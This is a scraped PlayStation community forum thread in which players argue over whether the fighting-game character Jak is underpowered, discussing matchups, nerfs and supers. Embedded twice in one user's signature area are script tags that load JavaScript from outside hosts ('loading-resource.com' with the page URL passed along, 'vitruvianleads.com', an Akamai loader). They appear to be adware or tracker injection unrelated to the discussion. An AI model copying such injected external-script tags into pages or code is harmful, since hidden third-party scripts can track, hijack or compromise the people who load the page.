Gaming Beast
2167 posts

Re: Any really good Jak players?

Jan 17, 2013
I understand where you're coming from. If you want to do a few games I'd be up for it.

Here's the thing, I feel the same way BECAUSE you've been playing people from the leaderboard, whereas I've been playing in tournaments. Now I realize there is a lot of overlap in the two, so honestly we could be talking about the same opponents, but IDK.

Out of curiosity, which matchups shut Jak down in 1v1? My theory (And it really is just that) are that as the game gets more aerial based, a lot of the currently used characters are going to get overshadowed by characters like the Coles, allowing some of the lower tier characters with good matchups against these characters to start seeing play time again (For example, Sackboy is actually starting to come back out again since he does well against EC and doesn't have to be on the ground too much).

Don't get me wrong, I don't think Jak will ever reach top tier status, but I can definitely see him becoming a strong counterpick character like Big Daddy or Sackboy.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 51 of 131 (212 Views)
0 Likes
Treasure Hunter
7051 posts

[ Edited ]
Jan 18, 2013

Fromundaman wrote:
I understand where you're coming from. If you want to do a few games I'd be up for it.

Here's the thing, I feel the same way BECAUSE you've been playing people from the leaderboard, whereas I've been playing in tournaments. Now I realize there is a lot of overlap in the two, so honestly we could be talking about the same opponents, but IDK.

Out of curiosity, which matchups shut Jak down in 1v1? My theory (And it really is just that) are that as the game gets more aerial based, a lot of the currently used characters are going to get overshadowed by characters like the Coles, allowing some of the lower tier characters with good matchups against these characters to start seeing play time again (For example, Sackboy is actually starting to come back out again since he does well against EC and doesn't have to be on the ground too much).

Don't get me wrong, I don't think Jak will ever reach top tier status, but I can definitely see him becoming a strong counterpick character like Big Daddy or Sackboy.

Actually not like them because Jak doesn't have the right tools that could possibly deal with every situation like Sackboy and Big Daddy do and doesn't have variety in his moves. I mean seriously you have to be a Jak main in order to understand perfectly.

Jak moves overall gives him no advantages what so ever. Thats what makes him a weak and low tier character. He started out as an A tier top rated character but then he got a major nerf that made him a low tier character. He has no counters only one effect stunning move, no good range in his guns except the Blaster(yellow gun). Im sorry to keep repeating this over and over over the internet, but Jak is just not a good character(anymore). SB nerfed him to hard(this is a fact). After the facts I listed on GF a lot of people realized it. I might re list them here. Im not arguing with you im just debating.... just for a little fyi..

Overall Jak is not balanced. Now unlike other people I found a usage for all his guns but still, they suck period and are not balanced properly. Jak's mobility is overrated. It may be the greatest in the game but its not that great. There was no reason for everysingle move of his to get nerfed. (Alright now for this im making a video for better comparisons later). Anyway Jak only has one unique move in this game and thats the Mass Inverter. His only possible chance at keeping enemies or spammers away like Raiden or Sly. Not only does his most unique gun only give him 5AP, but it also has the slowest start up of any move in the entire game, is not rewarding after use, leaves you open for a long time and can barely be combo'ed into. Now his Supers. I love all his supers but they all need buffs. Level 1 needs more width and slightly more height for certain platforms. Level 2 needs either more range, more of an air hitbox or a shorter jump when Jak leaps. Level 3 needs more time( 1extra sec or 2). I find myself struggling using it. With his overall bad character his Level 3 should last as long as Kratos similar to Sackboy as well(but not as long as Sackboys). Not only does Light Jak have a lot of structured gltiches but its duration is so short that once you miss an attack or get stuck thats already one kill or 2 kills taken away from you.

Overall with all these lacks in Jaks whole moveset he needs a buff. I didn't go into details about all the problems but I listed some to make a stronger point.

photo 1-Xzveb9U_zpsedcf7d52.png
Only time will tell.
Message 52 of 131 (203 Views)
0 Likes
Hekseville Citizen
385 posts

Jan 18, 2013
they should replace dark bomb with dark blast, and make it similar to kratos's lvl 2. As it is, I versed a jak who used it on me when I was in a corner and All i did was roll and I was safe....
December 11th 2012: Went 12-0 ranked FFA. (Jak)
December 13th 2012: Went 8-0 Stock Unranked FFA. (Jak)
January 10th 2013: Sniped Asis_aka_talent into Jak's lvl 1. (Uncle Radec)
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Just learnt "Drake" and is now learning "Nariko".
Message 53 of 131 (191 Views)
0 Likes
Lombax Warrior
121 posts

Jan 18, 2013

I wouldn't call Jak low teir, his mobility is the his single greatest characteristic and what makes him unique. most of his guns have little AP gain, but all have a use in one way or another. 

" Everybody following their heart; that's a loser's strategy"
-Seth Killian
Message 54 of 131 (186 Views)
0 Likes
Treasure Hunter
7051 posts

[ Edited ]
Jan 18, 2013

KLMN76 wrote:

I wouldn't call Jak low teir, his mobility is the his single greatest characteristic and what makes him unique. most of his guns have little AP gain, but all have a use in one way or another. 

Read what I said -_-

Every move in every game have a use but Jaks is executed poorly... At times characters can dodge certain moves of his because their slow start up and predictable'ness

Using the poor excuse and defense that every character can use a move in unique ways or whatever is lying to yourself. Im a jak main and have been maining Jak every single day(except the whole Christmas break through New years)and noone else. I have stuck with Jak for 99% of my character total usage. I have no 2nd main what so ever. I have been studying Jak throughly. I have came up with combos other Jak players dont know about... but thats besides the point. Point is jak needs a buff period.

Im tired of going into detail about why because some people miss my detailed post... Its a fact jak needs a buff if you actually do the math correctly.. Everything somebody has said to deny this I have had a point to beat theres because I know that well that Jak is not completely balanced...

photo 1-Xzveb9U_zpsedcf7d52.png
Only time will tell.
Message 55 of 131 (180 Views)
0 Likes
Hekseville Citizen
385 posts

Jan 18, 2013
When u play against other characters, u will find players who use characters differently. U may find a radec who plays long ranged, or like me who plays a more close ranged radec. But with jak, every jak player u see will play him the exact same way.
December 11th 2012: Went 12-0 ranked FFA. (Jak)
December 13th 2012: Went 8-0 Stock Unranked FFA. (Jak)
January 10th 2013: Sniped Asis_aka_talent into Jak's lvl 1. (Uncle Radec)
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Just learnt "Drake" and is now learning "Nariko".
Message 56 of 131 (150 Views)
Fender Bender
3755 posts

Jan 18, 2013
Dante is worst off than jak and that saying something. I don't use the empty cancel so you can see where and why my frustration is leading me to believe that.
Message 57 of 131 (131 Views)
0 Likes
Gaming Beast
2167 posts

Jan 18, 2013
I really need to play you to get a decent idea of your skill and what you're trying to convey, because what you're essentially telling me is that I can't possibly understand because I don't main Jak, and that somehow the fact that you main him alone makes you better than all others (I am one of the best GC's I've run into so far, yet both myself and the one I currently consider THE best picked him up less than a month ago.), yet the things you say don't seem to match up to what other good Jak's say or what I observe playing against him.

I'm not by any stretch saying he is a top tier character, nor am I saying that he hasn't been nerfed, or even that he couldn't use a buff (Some numbers need to be changed IMO, like that up triangle should really give more AP), but his playstyle fits the direction the metagame is currently going in.

Also you say Sackboy and Big Daddy have tools for every situation unlike Jak? I think you also don't know those characters, or at the very least BD. BD has no safe on block moves except jump canceled incinerate, and even that is punishable and not really something you can use raw. Jak actually has multiple safe on block options, so you know, a tool my character doesn't have.

Jak also has ways to deal damage to aerial opponents. I can try to hit up triangle or the tornado... and that's it. They're incredibly punishable as well.

I can go on, but I think my point is clear. I'm not saying Jak is a better character than Big Daddy since I don't think that's the case, but please don't assume Big Daddy has "All the tools" and that Jak has nothing that other characters can't do better, as that's simply not the case.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 58 of 131 (116 Views)
Lombax Warrior
121 posts

[ Edited ]
Jan 18, 2013

Jak is being very undersold, He is very reset based and spends most of his time in the air. I'm pretty sure that most people are just put off by the fact that he has little to no burst or hit comfirms. I also agree entirely on metagame, but I'm sure Kat will be favored more over Jak for her 8 way air dash more straight forward supers.

" Everybody following their heart; that's a loser's strategy"
-Seth Killian
Message 59 of 131 (115 Views)
0 Likes
Uncharted Territory
1785 posts

Jan 18, 2013

I use Jak quite differently from most cause I actually managed to find ways to get some use out of his so called "Useless attacks" I'll admit I do think his down circle in the air is really useful and I use it when I think it's safe to but I will also use a bit more strategy like baiting my opponent to let out their supers or something like that so that I can counter with a level 1 or 2 whichever one I have avalible, this is just based on what I've seen though, of all the Jaks I faced online I've only seen one really good Jak player, all the others just spam forward triangle or down circle, I'm not saying I am a god among Jak players because well, let's be realistic, someone out there is better than me but I just want to give an example because some of you seem to find Jak to be predictable because you always find people using the same strategies.

Message 60 of 131 (115 Views)
0 Likes